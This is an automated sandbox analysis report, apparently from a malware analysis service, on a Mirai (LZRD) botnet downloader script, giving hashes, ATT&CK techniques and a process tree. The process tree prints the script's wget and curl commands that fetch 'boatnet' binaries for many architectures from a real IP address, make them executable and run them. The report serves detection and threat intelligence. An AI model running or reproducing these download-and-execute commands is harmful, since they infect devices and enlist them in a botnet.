mirai | 84169b3c5a219018f397eceb2023846b9f47f0931c447422fc09396a79f40535

Analysis

max time kernel
149s
max time network
139s
platform
debian-9_mips
resource
debian9-mipsbe-20240611-en
resource tags

arch:mipsimage:debian9-mipsbe-20240611-enkernel:4.9.0-13-4kc-maltalocale:en-usos:debian-9-mipssystem
submitted
18-02-2025 04:12

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

ohshit.sh
Size

2KB
MD5

32774e26d02b3c1b8e5c9bf8b5992be0
SHA1

ad7e3cdf5913a6397e51fc0570e99e3f2b5cd2c6
SHA256

84169b3c5a219018f397eceb2023846b9f47f0931c447422fc09396a79f40535
SHA512

e00b5a106b8c6529679e10323802c998316e4e6240659a239b7680344ee860e457d8d3274de7d88ee4afb14b6b465651d8944b8bb8ab9c805ad74111c007f0ba

Score

10^/10

mirai lzrd botnet defense_evasion discovery upx

Malware Config

Extracted

Family

mirai

Botnet

LZRD

Extracted

Family

mirai

Botnet

LZRD

Extracted

Family

mirai

Botnet

LZRD

Signatures

Mirai
Mirai is a prevalent Linux malware infecting exposed network devices.
botnet mirai
Mirai family
mirai

File and Directory Permissions Modification 1 TTPs 15 IoCs

Adversaries may modify file or directory permissions to evade defenses.

defense_evasion

Linux and Mac File and Directory Permissions Modification

T1222.002

pid	Process
791	chmod
857	chmod
895	chmod
901	chmod
740	chmod
746	chmod
812	chmod
877	chmod
889	chmod
754	chmod
772	chmod
820	chmod
826	chmod
832	chmod
883	chmod

Executes dropped EXE 15 IoCs

ioc	pid	Process
/tmp/WTF	741	ohshit.sh
/tmp/WTF	747	ohshit.sh
/tmp/WTF	755	ohshit.sh
/tmp/WTF	773	ohshit.sh
/tmp/WTF	792	ohshit.sh
/tmp/WTF	814	ohshit.sh
/tmp/WTF	821	ohshit.sh
/tmp/WTF	827	ohshit.sh
/tmp/WTF	833	ohshit.sh
/tmp/WTF	858	ohshit.sh
/tmp/WTF	878	ohshit.sh
/tmp/WTF	884	ohshit.sh
/tmp/WTF	890	ohshit.sh
/tmp/WTF	896	ohshit.sh
/tmp/WTF	902	ohshit.sh

Modifies Watchdog functionality 1 TTPs 2 IoCs

Malware like Mirai modifies the Watchdog to prevent it restarting an infected system.

defense_evasion

Impair Defenses

T1562

description	ioc	Process
File opened for modification	/dev/watchdog	WTF
File opened for modification	/dev/misc/watchdog	WTF

Writes file to system bin folder 2 IoCs

description	ioc	Process
File opened for modification	/bin/watchdog	WTF
File opened for modification	/sbin/watchdog	WTF

UPX packed file 2 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral3/files/fstream-1.dat	upx
behavioral3/files/fstream-4.dat	upx

Reads runtime system information 56 IoCs

Reads data from /proc virtual filesystem.

discovery

description	ioc	Process
File opened for reading	/proc/860/cmdline	WTF
File opened for reading	/proc/702/cmdline	WTF
File opened for reading	/proc/800/cmdline	WTF
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/862/cmdline	WTF
File opened for reading	/proc/868/cmdline	WTF
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/886/cmdline	WTF
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/768/cmdline	WTF
File opened for reading	/proc/829/cmdline	WTF
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/714/cmdline	WTF
File opened for reading	/proc/815/cmdline	WTF
File opened for reading	/proc/893/cmdline	WTF
File opened for reading	/proc/750/cmdline	WTF
File opened for reading	/proc/762/cmdline	WTF
File opened for reading	/proc/869/cmdline	WTF
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/824/cmdline	WTF
File opened for reading	/proc/844/cmdline	WTF
File opened for reading	/proc/881/cmdline	WTF
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/785/cmdline	WTF
File opened for reading	/proc/813/cmdline	WTF
File opened for reading	/proc/846/cmdline	WTF
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/803/cmdline	WTF
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/899/cmdline	WTF
File opened for reading	/proc/429/cmdline	WTF
File opened for reading	/proc/703/cmdline	WTF
File opened for reading	/proc/818/cmdline	WTF
File opened for reading	/proc/679/cmdline	WTF
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/837/cmdline	WTF
File opened for reading	/proc/835/cmdline	WTF
File opened for reading	/proc/686/cmdline	WTF
File opened for reading	/proc/781/cmdline	WTF
File opened for reading	/proc/830/cmdline	WTF
File opened for reading	/proc/717/cmdline	WTF
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/683/cmdline	WTF
File opened for reading	/proc/707/cmdline	WTF
File opened for reading	/proc/710/cmdline	WTF
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/675/cmdline	WTF
File opened for reading	/proc/685/cmdline	WTF
File opened for reading	/proc/709/cmdline	WTF
File opened for reading	/proc/851/cmdline	WTF
File opened for reading	/proc/708/cmdline	WTF
File opened for reading	/proc/798/cmdline	WTF

System Network Configuration Discovery 1 TTPs 3 IoCs

Adversaries may gather information about the network configuration of a system.

discovery

System Network Configuration Discovery

T1016

pid	Process
744	curl
745	cat
743	wget

Writes file to tmp directory 28 IoCs

Malware often drops required files in the /tmp directory.

description	ioc	Process
File opened for modification	/tmp/WTF	ohshit.sh
File opened for modification	/tmp/boatnet.mips	wget
File opened for modification	/tmp/boatnet.sh4	curl
File opened for modification	/tmp/boatnet.x86	wget
File opened for modification	/tmp/boatnet.x86_64	curl
File opened for modification	/tmp/boatnet.arm5	curl
File opened for modification	/tmp/boatnet.arm7	curl
File opened for modification	/tmp/boatnet.ppc	wget
File opened for modification	/tmp/boatnet.spc	curl
File opened for modification	/tmp/boatnet.spc	wget
File opened for modification	/tmp/boatnet.sh4	wget
File opened for modification	/tmp/boatnet.i686	curl
File opened for modification	/tmp/boatnet.arm5	wget
File opened for modification	/tmp/boatnet.arm6	curl
File opened for modification	/tmp/boatnet.arm	curl
File opened for modification	/tmp/boatnet.m68k	wget
File opened for modification	/tmp/boatnet.x86	curl
File opened for modification	/tmp/boatnet.mips	curl
File opened for modification	/tmp/boatnet.mpsl	curl
File opened for modification	/tmp/boatnet.arm	wget
File opened for modification	/tmp/boatnet.arm7	wget
File opened for modification	/tmp/boatnet.arc	curl
File opened for modification	/tmp/boatnet.mpsl	wget
File opened for modification	/tmp/boatnet.arm6	wget
File opened for modification	/tmp/boatnet.m68k	curl
File opened for modification	/tmp/boatnet.arc	wget
File opened for modification	/tmp/boatnet.i468	curl
File opened for modification	/tmp/boatnet.ppc	curl

/tmp/ohshit.sh
/tmp/ohshit.sh
1⤵
- Executes dropped EXE
- Writes file to tmp directory
PID:710
- /usr/bin/wget
  wget http://196.251.87.222/hiddenbin/boatnet.x86
  2⤵
  - Writes file to tmp directory
  PID:713
- /usr/bin/curl
  curl -O http://196.251.87.222/hiddenbin/boatnet.x86
  2⤵
  - Reads runtime system information
  - Writes file to tmp directory
  PID:737
- /bin/cat
  cat boatnet.x86
  2⤵
  PID:739
- /bin/chmod
  chmod +x boatnet.x86 ohshit.sh systemd-private-c9427e9946d644ce929081cb6c4047ec-systemd-timedated.service-zIrMUz WTF
  2⤵
  - File and Directory Permissions Modification
  PID:740
- /tmp/WTF
  ./WTF
  2⤵
  PID:741
- /usr/bin/wget
  wget http://196.251.87.222/hiddenbin/boatnet.mips
  2⤵
  - System Network Configuration Discovery
  - Writes file to tmp directory
  PID:743
- /usr/bin/curl
  curl -O http://196.251.87.222/hiddenbin/boatnet.mips
  2⤵
  - Reads runtime system information
  - System Network Configuration Discovery
  - Writes file to tmp directory
  PID:744
- /bin/cat
  cat boatnet.mips
  2⤵
  - System Network Configuration Discovery
  PID:745
- /bin/chmod
  chmod +x boatnet.mips boatnet.x86 ohshit.sh systemd-private-c9427e9946d644ce929081cb6c4047ec-systemd-timedated.service-zIrMUz WTF
  2⤵
  - File and Directory Permissions Modification
  PID:746
- /tmp/WTF
  ./WTF
  2⤵
  - Modifies Watchdog functionality
  - Writes file to system bin folder
  - Reads runtime system information
  PID:747
- /usr/bin/wget
  wget http://196.251.87.222/hiddenbin/boatnet.arc
  2⤵
  - Writes file to tmp directory
  PID:751
- /usr/bin/curl
  curl -O http://196.251.87.222/hiddenbin/boatnet.arc
  2⤵
  - Reads runtime system information
  - Writes file to tmp directory
  PID:752
- /bin/cat
  cat boatnet.arc
  2⤵
  PID:753
- /bin/chmod
  chmod +x boatnet.arc boatnet.mips boatnet.x86 ohshit.sh systemd-private-c9427e9946d644ce929081cb6c4047ec-systemd-timedated.service-zIrMUz WTF
  2⤵
  - File and Directory Permissions Modification
  PID:754
- /tmp/WTF
  ./WTF
  2⤵
  PID:755
- /usr/bin/wget
  wget http://196.251.87.222/hiddenbin/boatnet.i468
  2⤵
  PID:757
- /usr/bin/curl
  curl -O http://196.251.87.222/hiddenbin/boatnet.i468
  2⤵
  - Reads runtime system information
  - Writes file to tmp directory
  PID:762
- /bin/cat
  cat boatnet.i468
  2⤵
  PID:770
- /bin/chmod
  chmod +x boatnet.arc boatnet.i468 boatnet.mips boatnet.x86 ohshit.sh systemd-private-c9427e9946d644ce929081cb6c4047ec-systemd-timedated.service-zIrMUz WTF
  2⤵
  - File and Directory Permissions Modification
  PID:772
- /tmp/WTF
  ./WTF
  2⤵
  PID:773
- /usr/bin/wget
  wget http://196.251.87.222/hiddenbin/boatnet.i686
  2⤵
  PID:775
- /usr/bin/curl
  curl -O http://196.251.87.222/hiddenbin/boatnet.i686
  2⤵
  - Reads runtime system information
  - Writes file to tmp directory
  PID:781
- /bin/cat
  cat boatnet.i686
  2⤵
  PID:789
- /bin/chmod
  chmod +x boatnet.arc boatnet.i468 boatnet.i686 boatnet.mips boatnet.x86 ohshit.sh systemd-private-c9427e9946d644ce929081cb6c4047ec-systemd-timedated.service-zIrMUz WTF
  2⤵
  - File and Directory Permissions Modification
  PID:791
- /tmp/WTF
  ./WTF
  2⤵
  PID:792
- /usr/bin/wget
  wget http://196.251.87.222/hiddenbin/boatnet.x86_64
  2⤵
  PID:793
- /usr/bin/curl
  curl -O http://196.251.87.222/hiddenbin/boatnet.x86_64
  2⤵
  - Reads runtime system information
  - Writes file to tmp directory
  PID:800
- /bin/cat
  cat boatnet.x86_64
  2⤵
  PID:810
- /bin/chmod
  chmod +x boatnet.arc boatnet.i468 boatnet.i686 boatnet.mips boatnet.x86 boatnet.x86_64 ohshit.sh systemd-private-c9427e9946d644ce929081cb6c4047ec-systemd-timedated.service-zIrMUz WTF
  2⤵
  - File and Directory Permissions Modification
  PID:812
- /tmp/WTF
  ./WTF
  2⤵
  PID:814
- /usr/bin/wget
  wget http://196.251.87.222/hiddenbin/boatnet.mpsl
  2⤵
  - Writes file to tmp directory
  PID:815
- /usr/bin/curl
  curl -O http://196.251.87.222/hiddenbin/boatnet.mpsl
  2⤵
  - Reads runtime system information
  - Writes file to tmp directory
  PID:818
- /bin/cat
  cat boatnet.mpsl
  2⤵
  PID:819
- /bin/chmod
  chmod +x boatnet.arc boatnet.i468 boatnet.i686 boatnet.mips boatnet.mpsl boatnet.x86 boatnet.x86_64 ohshit.sh systemd-private-c9427e9946d644ce929081cb6c4047ec-systemd-timedated.service-zIrMUz WTF
  2⤵
  - File and Directory Permissions Modification
  PID:820
- /tmp/WTF
  ./WTF
  2⤵
  PID:821
- /usr/bin/wget
  wget http://196.251.87.222/hiddenbin/boatnet.arm
  2⤵
  - Writes file to tmp directory
  PID:823
- /usr/bin/curl
  curl -O http://196.251.87.222/hiddenbin/boatnet.arm
  2⤵
  - Reads runtime system information
  - Writes file to tmp directory
  PID:824
- /bin/cat
  cat boatnet.arm
  2⤵
  PID:825
- /bin/chmod
  chmod +x boatnet.arc boatnet.arm boatnet.i468 boatnet.i686 boatnet.mips boatnet.mpsl boatnet.x86 boatnet.x86_64 ohshit.sh systemd-private-c9427e9946d644ce929081cb6c4047ec-systemd-timedated.service-zIrMUz WTF
  2⤵
  - File and Directory Permissions Modification
  PID:826
- /tmp/WTF
  ./WTF
  2⤵
  PID:827
- /usr/bin/wget
  wget http://196.251.87.222/hiddenbin/boatnet.arm5
  2⤵
  - Writes file to tmp directory
  PID:829
- /usr/bin/curl
  curl -O http://196.251.87.222/hiddenbin/boatnet.arm5
  2⤵
  - Reads runtime system information
  - Writes file to tmp directory
  PID:830
- /bin/cat
  cat boatnet.arm5
  2⤵
  PID:831
- /bin/chmod
  chmod +x boatnet.arc boatnet.arm boatnet.arm5 boatnet.i468 boatnet.i686 boatnet.mips boatnet.mpsl boatnet.x86 boatnet.x86_64 ohshit.sh systemd-private-c9427e9946d644ce929081cb6c4047ec-systemd-timedated.service-zIrMUz WTF
  2⤵
  - File and Directory Permissions Modification
  PID:832
- /tmp/WTF
  ./WTF
  2⤵
  PID:833
- /usr/bin/wget
  wget http://196.251.87.222/hiddenbin/boatnet.arm6
  2⤵
  - Writes file to tmp directory
  PID:835
- /usr/bin/curl
  curl -O http://196.251.87.222/hiddenbin/boatnet.arm6
  2⤵
  - Reads runtime system information
  - Writes file to tmp directory
  PID:846
- /bin/cat
  cat boatnet.arm6
  2⤵
  PID:855
- /bin/chmod
  chmod +x boatnet.arc boatnet.arm boatnet.arm5 boatnet.arm6 boatnet.i468 boatnet.i686 boatnet.mips boatnet.mpsl boatnet.x86 boatnet.x86_64 ohshit.sh WTF
  2⤵
  - File and Directory Permissions Modification
  PID:857
- /tmp/WTF
  ./WTF
  2⤵
  PID:858
- /usr/bin/wget
  wget http://196.251.87.222/hiddenbin/boatnet.arm7
  2⤵
  - Writes file to tmp directory
  PID:860
- /usr/bin/curl
  curl -O http://196.251.87.222/hiddenbin/boatnet.arm7
  2⤵
  - Reads runtime system information
  - Writes file to tmp directory
  PID:869
- /bin/cat
  cat boatnet.arm7
  2⤵
  PID:876
- /bin/chmod
  chmod +x boatnet.arc boatnet.arm boatnet.arm5 boatnet.arm6 boatnet.arm7 boatnet.i468 boatnet.i686 boatnet.mips boatnet.mpsl boatnet.x86 boatnet.x86_64 ohshit.sh WTF
  2⤵
  - File and Directory Permissions Modification
  PID:877
- /tmp/WTF
  ./WTF
  2⤵
  PID:878
- /usr/bin/wget
  wget http://196.251.87.222/hiddenbin/boatnet.ppc
  2⤵
  - Writes file to tmp directory
  PID:880
- /usr/bin/curl
  curl -O http://196.251.87.222/hiddenbin/boatnet.ppc
  2⤵
  - Reads runtime system information
  - Writes file to tmp directory
  PID:881
- /bin/cat
  cat boatnet.ppc
  2⤵
  PID:882
- /bin/chmod
  chmod +x boatnet.arc boatnet.arm boatnet.arm5 boatnet.arm6 boatnet.arm7 boatnet.i468 boatnet.i686 boatnet.mips boatnet.mpsl boatnet.ppc boatnet.x86 boatnet.x86_64 ohshit.sh WTF
  2⤵
  - File and Directory Permissions Modification
  PID:883
- /tmp/WTF
  ./WTF
  2⤵
  PID:884
- /usr/bin/wget
  wget http://196.251.87.222/hiddenbin/boatnet.spc
  2⤵
  - Writes file to tmp directory
  PID:886
- /usr/bin/curl
  curl -O http://196.251.87.222/hiddenbin/boatnet.spc
  2⤵
  - Reads runtime system information
  - Writes file to tmp directory
  PID:887
- /bin/cat
  cat boatnet.spc
  2⤵
  PID:888
- /bin/chmod
  chmod +x boatnet.arc boatnet.arm boatnet.arm5 boatnet.arm6 boatnet.arm7 boatnet.i468 boatnet.i686 boatnet.mips boatnet.mpsl boatnet.ppc boatnet.spc boatnet.x86 boatnet.x86_64 ohshit.sh WTF
  2⤵
  - File and Directory Permissions Modification
  PID:889
- /tmp/WTF
  ./WTF
  2⤵
  PID:890
- /usr/bin/wget
  wget http://196.251.87.222/hiddenbin/boatnet.m68k
  2⤵
  - Writes file to tmp directory
  PID:892
- /usr/bin/curl
  curl -O http://196.251.87.222/hiddenbin/boatnet.m68k
  2⤵
  - Reads runtime system information
  - Writes file to tmp directory
  PID:893
- /bin/cat
  cat boatnet.m68k
  2⤵
  PID:894
- /bin/chmod
  chmod +x boatnet.arc boatnet.arm boatnet.arm5 boatnet.arm6 boatnet.arm7 boatnet.i468 boatnet.i686 boatnet.m68k boatnet.mips boatnet.mpsl boatnet.ppc boatnet.spc boatnet.x86 boatnet.x86_64 ohshit.sh WTF
  2⤵
  - File and Directory Permissions Modification
  PID:895
- /tmp/WTF
  ./WTF
  2⤵
  PID:896
- /usr/bin/wget
  wget http://196.251.87.222/hiddenbin/boatnet.sh4
  2⤵
  - Writes file to tmp directory
  PID:898
- /usr/bin/curl
  curl -O http://196.251.87.222/hiddenbin/boatnet.sh4
  2⤵
  - Reads runtime system information
  - Writes file to tmp directory
  PID:899
- /bin/cat
  cat boatnet.sh4
  2⤵
  PID:900
- /bin/chmod
  chmod +x boatnet.arc boatnet.arm boatnet.arm5 boatnet.arm6 boatnet.arm7 boatnet.i468 boatnet.i686 boatnet.m68k boatnet.mips boatnet.mpsl boatnet.ppc boatnet.sh4 boatnet.spc boatnet.x86 boatnet.x86_64 ohshit.sh WTF
  2⤵
  - File and Directory Permissions Modification
  PID:901
- /tmp/WTF
  ./WTF
  2⤵
  PID:902

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

File and Directory Permissions Modification

T1222

Linux and Mac File and Directory Permissions Modification

T1222.002

Impair Defenses

T1562

Credential Access

Discovery

System Network Configuration Discovery

T1016

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

/tmp/WTF

Filesize
23KB

MD5
cee6585e60fc85044c942cc41fc69eec

SHA1
b2901dc34ac518fe5430af9ce827022846b95577

SHA256
0445d12106a314074d4b96870742787452528196da68b67def54cc1d97a228cb

SHA512
dc9d804e7dd048ba5305ba10758093f63fab453bac41b5a331ec157309c4e6feb8018f1fa82ad4f5167a3cc8063de3548b0e39c53802ab9aaf0325e82fc84cb8

Download Submit
/tmp/WTF

Filesize
105KB

MD5
4c125873f27e37b37d7c12452d507215

SHA1
e08f8ab877b6abd87bfbee80347f0bbdba93bed0

SHA256
35e1279abdbf2bee230f3aeb00f8412136da9638cda2c2908e056a6072c3e69c

SHA512
20017ce619089512f4ef09ec2e73ca1a322b797f9751b6829a515a4cb1b4dde6799197dd70bc01805cb333cbf944adb489eb0203d78a7e0080d66d2aa3041ca6

Download Submit
/tmp/WTF

Filesize
220B

MD5
f1c24d9fa40a047ae22d2d3ae7dfeac9

SHA1
750274b02d5f5b00026a4f55b020f4285c693533

SHA256
219db693bfc6306868548b227030b636aaba7e2b2ad0582a8977ecef92d674bc

SHA512
36bd34e999eb4426823cadcf27076cf1128470e340172336ac3e3bdf3f194d0c873684f67b8d341df85eeb955e3c9dc3657ad7c5f05525e5c254476605d5b259

Download Submit
/tmp/WTF

Filesize
220B

MD5
a8f502a6fb3b7b940e922c951d9e493a

SHA1
fa94d6dade6bb7537ee3f58f2984b80f4b02dcdf

SHA256
748429c25463cc890809a866bfe2cb313f072be73bf5ea88fb4f65e26aa97bec

SHA512
e4ada74640d3ad58a6181ab1cd05fadd584788806908b00cf80924a19f29118a17f581d72d9abf1aa207f83d1e4ab163ea6c0c1e0ee6f2e211d1e0d366a27338

Download Submit
/tmp/WTF

Filesize
57KB

MD5
a1870420c700ebc5d888818a29c802de

SHA1
4db6780a1e145360a2b1eb4bfd86651f9b6df5b9

SHA256
ea80cc6170eaada0e2fdb09a2c509a1b5646371e420066e88f8515974c922b99

SHA512
20c586583f6cacb05c49ee0e5691d499797f4e78203f77be0fc9ee784e74a4e70754ee505e3614b6b04ebec6cb683e48228925892bd45e002779d425b979582f

Download Submit
/tmp/boatnet.x86

Filesize
20KB

MD5
96f3a4c996750d9f2254cc55883c2ee4

SHA1
985d2163502ffe96c88c2c578cb9205c6140947a

SHA256
984e3565cdf897a62523a6776c16835634be7312a415d8c36c56ce14545539d7

SHA512
6b29d2fa53cc5a912372da02c52e69fd440494cf84054adaa45d8a2d5600e514e9b0ce5a56f417de7df698de3e52e2b2800561be15b6e6e7da67bd6f5d00a7e1

Download Submit

Analysis

Sharing

General

Malware Config

Extracted

Extracted

Extracted

Signatures

Processes

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads